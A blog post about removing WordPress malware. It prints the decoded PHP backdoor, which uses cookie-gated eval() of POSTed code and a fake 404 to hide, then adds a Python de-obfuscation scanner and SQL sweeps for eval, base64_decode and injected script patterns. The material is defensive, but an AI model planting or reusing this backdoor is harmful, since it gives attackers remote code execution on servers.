Fixing My Wordpress Malware Problem
Here are the contents of the file detected by WP-Malwatch:
When I decoded it, it translated to:
<?php $YjlSRnt='eval(base64_decode(\'ZXJyb3JfcmVwb3J0aXhpdCg this went on for about 2000 lines pOwp9\'));';
In the source of the pages my site was serving to you, that translated to:
<?php
error_reporting(0);
$md5_cookie_shell='e954f2b73a1137e7cd7bfcc9df464eab';
$md5_name_cookie_shell='7d9897ac32d34e965e8a72239fdb3afa';
$md5_name_cookie_eval='2cffc36de4a1abcd64d996d3e22c8fd0';
$md5_cookie_eval='b7ecebf10cf92cd63d6f9235e66119cd';
// Backdoor 1: a cookie whose name and value hash to the stored MD5s unlocks
// eval() of whatever base64-encoded PHP arrives in POST 'code'.
foreach($_COOKIE as $key => $value){
    if(md5($key)==$md5_name_cookie_eval and md5($value)==$md5_cookie_eval){
        if(isset($_POST['code'])) {
            eval(base64_decode($_POST['code']));exit;
        }
        break;
    }
}
// Backdoor 2: a second cookie pair unlocks the embedded payload at the bottom.
$local_param=false;
foreach($_COOKIE as $key => $value){
    if(md5($key)==$md5_name_cookie_shell and md5($value)==$md5_cookie_shell){
        $local_param=true;
        break;
    }
}
if(!$local_param){
    // Anyone without the unlock cookie: abort if the request looks like a
    // scanner probe, otherwise serve a fake 404 so the file looks absent.
    function my_armor($post,$get,$cookie){
        $post_arr=implode('.',$post);
        $get_arr=implode('.',$get);
        $cook_arr=implode('.',$cookie);
        $post_arr_key=implode('.',@array_flip($post));
        $get_arr_key=implode('.',@array_flip($get));
        $other_shtuki=@file_get_contents('php://input');
        // $cook_arr_key is never assigned; this is the malware's own bug, kept as found.
        $cracktrack = strtolower($post_arr.$get_arr.$post_arr_key.$get_arr_key.$cook_arr_key.$other_shtuki);
        $wormprotector = array('base64','user_pass','substring','or id=','eval(','nutch','create_function');
        $checkworm = str_replace($wormprotector, '*', $cracktrack);
        if ($cracktrack != $checkworm) @wp_die(__('You do not have sufficient permissions'))or die("");
    }
    function error404(){
        header("HTTP/1.1 404 Not Found");
        header("Connection: close");
        echo "
Not Found
The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server
".(("" != $_SERVER['SERVER_SIGNATURE']) ? $_SERVER['SERVER_SIGNATURE'] : ($_SERVER['SERVER_SOFTWARE']." Server at ".$_SERVER['SERVER_NAME']." Port ".$_SERVER['SERVER_PORT'])) ."
";
    }
    my_armor($_POST,$_GET,$_COOKIE);
    error404();
}
if ($local_param){
    // The unlocked path: decode and run the bundled payload.
    $c='ZXJyb3JfcmV this went on for a few thousand lines G8gJzwvYm9keT48L2h0bWw+Jzs=';
    $c=base64_decode($c);
    eval($c);
    exit();
}
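The "decode it, then decode what that decodes" step above is worth automating, because a scanner that only looks at the outer file sees one long base64 string and nothing else. The following is an added example in Python, not code from the post or from WP-Malwatch: it statically peels nested eval(base64_decode('...')) wrappers without ever executing them, then looks in every layer for the traits the decoded backdoor shows (error_reporting(0), eval of base64, eval of request input, MD5-gated cookie checks, php://input reads, the fake 404). The sample "infected" file, the helper names (peel_layers, scan, wrap) and the indicator labels are all constructed for the example.

```python
import base64
import binascii
import re
from typing import List, Tuple

# Matches base64_decode('...') with plain or backslash-escaped quotes, the
# form used by the $YjlSRnt wrapper quoted in the post.
B64_CALL = re.compile(r"base64_decode\(\\?['\"]([A-Za-z0-9+/=\s]+?)\\?['\"]\)")

# Traits of the decoded backdoor shown above; each entry is (label, pattern).
INDICATORS = [
    ("silenced_errors", re.compile(r"error_reporting\(\s*0\s*\)")),
    ("eval_of_base64", re.compile(r"eval\s*\(\s*base64_decode")),
    ("eval_of_request_input", re.compile(r"eval\s*\(.*\$_(POST|GET|COOKIE|REQUEST)\b")),
    ("md5_cookie_gate", re.compile(r"md5\(\s*\$(key|value)\s*\)\s*==")),
    ("raw_input_read", re.compile(r"php://input")),
    ("fake_404", re.compile(r"HTTP/1\.1 404 Not Found")),
]


def peel_layers(source: str, max_depth: int = 10) -> List[str]:
    """Statically unwrap nested eval(base64_decode('...')) layers.

    Returns [source, layer1, layer2, ...]. Nothing is executed: each layer is
    only base64-decoded and searched for the next wrapper. max_depth stops
    a maliciously deep or self-referential chain.
    """
    layers = [source]
    current = source
    for _ in range(max_depth):
        m = B64_CALL.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except binascii.Error:
            break  # not real base64; stop rather than guess
        layers.append(decoded)
        current = decoded
    return layers


def scan(source: str) -> Tuple[int, List[str]]:
    """Return (number of wrapper layers peeled, indicator labels seen in any layer)."""
    layers = peel_layers(source)
    hits = [label for label, rx in INDICATORS if any(rx.search(layer) for layer in layers)]
    return len(layers) - 1, hits


def wrap(payload: str) -> str:
    """Build one $v='eval(base64_decode(\\'...\\'));'; eval($v); layer.

    Constructed helper so the example has a two-layer sample to work on.
    """
    b64 = base64.b64encode(payload.encode()).decode()
    return "<?php $v='eval(base64_decode(\\'" + b64 + "\\'));'; eval($v);"


# Constructed fragment carrying the same traits as the decoded code above.
INNER = (
    "<?php\nerror_reporting(0);\n"
    "foreach($_COOKIE as $key => $value){\n"
    "  if(md5($key)==$md5_name_cookie_eval){ eval(base64_decode($_POST['code'])); }\n"
    "}\n"
)
SAMPLE_INFECTED = wrap(wrap(INNER))   # two wrapper layers around INNER
SAMPLE_CLEAN = "<?php echo 'hello';"

if __name__ == "__main__":
    for name, src in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        depth, hits = scan(src)
        print(f"{name}: {depth} wrapper layer(s), indicators: {hits}")
```

Run against a real tree, feed each .php file's text to scan() and treat any file with two or more indicators, or any peeled layer at all, as worth a manual look. Decoding rather than executing is the point: the peeled layers are exactly what the post shows by hand, and the file never runs.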
And here are the queries I used when trying to find the culprit. Simply replace BADSITENAME with the names of sites indicated by Google Webmaster Tools:

- select * from wp_options where option_name = 'wp_check_hash'
- select * from wp_options where option_name = 'class_generic_support'
- select * from wp_options where option_name = 'widget_generic_support'
- select * from wp_options where option_name = 'ftp_credentials'
- select * from wp_options where option_name = 'fwp'
- select * from wp_options where option_name LIKE 'rss_%' (EXCEPT: rss_language, rss_use_excerpt, and rss_excerpt_length)
- select * from wp_comments where comment_author_email like '%eval(%' or comment_author_url like '%eval(%' or comment_content like '%eval(%'
- select * from wp_postmeta where meta_value like '%eval(%'
- select * from wp_posts where post_content like '%eval(%' or post_title like '%eval(%'
- select * from wp_comments where comment_author_email like '%base64_decode%' or comment_author_url like '%base64_decode%' or comment_content like '%base64_decode%'
- select * from wp_postmeta where meta_value like '%base64_decode%'
- select * from wp_posts where post_content like '%base64_decode%' or post_title like '%base64_decode%'
- select * from wp_comments where comment_author_email like '%BADSITE1.biz%' or comment_author_url like '%BADSITE1.biz%' or comment_content like '%BADSITE1.biz%'
- select * from wp_comments where comment_author_email like '%BADSITE2.name%' or comment_author_url like '%BADSITE2.name%' or comment_content like '%BADSITE2.name%'
- select * from wp_comments where comment_author_email like '%BADSITE3.us%' or comment_author_url like '%BADSITE3.us%' or comment_content like '%BADSITE3.us%'
- select * from wp_comments where comment_author_email like '%<script%' or comment_author_email like '%<script%' or comment_author_url like '%<script%' or comment_author_url like '%<script%' or comment_content like '%<script%' or comment_content like '%<script%'
- select * from wp_comments where comment_author_email like '%<iframe%' or comment_author_email like '%<iframe%' or comment_author_url like '%<iframe%' or comment_author_url like '%<iframe%' or comment_content like '%<iframe%' or comment_content like '%<iframe%'
- select * from wp_postmeta where meta_value like '%BADSITE1.biz%'
- select * from wp_postmeta where meta_value like '%BADSITE2.name%'
- select * from wp_postmeta where meta_value like '%BADSITE3.us%'
- select * from wp_postmeta where meta_value like '%<script%' or meta_value like '%<script%'
- select * from wp_postmeta where meta_value like '%<iframe%' or meta_value like '%<iframe%'
- select * from wp_posts where post_content like '%BADSITE1.biz%' or post_title like '%BADSITE1.biz%'
- select * from wp_posts where post_content like '%BADSITE2.name%' or post_title like '%BADSITE2.name%'
- select * from wp_posts where post_content like '%BADSITE3.us%' or post_title like '%BADSITE3.us%'
- select * from wp_posts where post_content like '%<script%' or post_content like '%<script%' or post_title like '%<script%' or post_title like '%<script%'
- select * from wp_posts where post_content like '%<iframe%' or post_content like '%<iframe%' or post_title like '%<iframe%' or post_title like '%<iframe%'
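The post/comment/postmeta queries above are one pattern repeated over three tables, their text columns, and a list of substrings, so they can be generated instead of typed. The following is an added Python example, not the post's own queries or any WordPress tool: it sweeps the same tables and columns for the same substrings plus the reported domains, and goes one step beyond the listed SQL by escaping LIKE metacharacters, so that base64_decode matches the literal underscore rather than any character. It assumes the default wp_ table prefix, uses an in-memory SQLite database as a constructed stand-in for the live MySQL tables (the sample rows are invented), and keeps the post's BADSITE placeholders; the function names sweep, escape_like and make_fixture are the example's own.

```python
import sqlite3
from typing import Dict, List, Tuple

# Table -> (primary key column, text columns to sweep), following the
# wp_posts / wp_comments / wp_postmeta queries listed above.
SWEEP: Dict[str, Tuple[str, List[str]]] = {
    "wp_posts": ("ID", ["post_content", "post_title"]),
    "wp_comments": ("comment_ID", ["comment_author_email", "comment_author_url", "comment_content"]),
    "wp_postmeta": ("meta_id", ["meta_value"]),
}

# Substrings the post hunts for; the reported domains are appended at call time.
BASE_PATTERNS = ["eval(", "base64_decode", "<script", "<iframe"]


def escape_like(s: str) -> str:
    """Make '%', '_' and '\\' literal inside a LIKE pattern used with ESCAPE '\\'."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def sweep(conn: sqlite3.Connection, bad_sites: List[str]) -> List[Tuple[str, str, str, int]]:
    """Return (table, column, pattern, row id) for every LIKE match."""
    patterns = BASE_PATTERNS + list(bad_sites)
    hits = []
    for table, (pk, columns) in SWEEP.items():
        for column in columns:
            # Identifiers come only from the fixed SWEEP map above; the pattern
            # itself is passed as a bound parameter, never spliced into the SQL.
            sql = f"SELECT {pk} FROM {table} WHERE {column} LIKE ? ESCAPE '\\'"
            for pat in patterns:
                like = "%" + escape_like(pat) + "%"
                for (row_id,) in conn.execute(sql, (like,)):
                    hits.append((table, column, pat, row_id))
    return hits


def make_fixture() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the three WordPress tables (sample rows invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_posts(ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
        CREATE TABLE wp_comments(comment_ID INTEGER PRIMARY KEY, comment_author_email TEXT,
                                 comment_author_url TEXT, comment_content TEXT);
        CREATE TABLE wp_postmeta(meta_id INTEGER PRIMARY KEY, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?)", [
        (1, "Hello world", "<p>Welcome to my site.</p>"),
        (2, "Gallery", '<p>pics</p><iframe src="http://BADSITE1.biz/x"></iframe>'),
    ])
    conn.executemany("INSERT INTO wp_comments VALUES (?,?,?,?)", [
        (1, "reader@example.com", "http://example.com/", "Nice post"),
        (2, "spam@example.net", "http://BADSITE2.name/", '<script src="http://BADSITE2.name/a.js"></script>'),
    ])
    conn.executemany("INSERT INTO wp_postmeta VALUES (?,?)", [
        (1, "sidebar"),
        (2, "eval(base64_decode('ZXhhbXBsZQ=='));"),
    ])
    return conn


if __name__ == "__main__":
    for hit in sweep(make_fixture(), ["BADSITE1.biz", "BADSITE2.name", "BADSITE3.us"]):
        print("%-12s %-22s %-14s row %d" % hit)
```

Against the real site, swap the SQLite connection for a MySQL one (the SQL is the same; MySQL's default LIKE escape character is already the backslash) and review every returned row id by hand before deleting anything. The wp_options checks from the list are exact option_name lookups rather than substring sweeps, so they stay as written.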
Comments from my old blog:
U.C. said: What a pain at 2010-08-26 07:10:27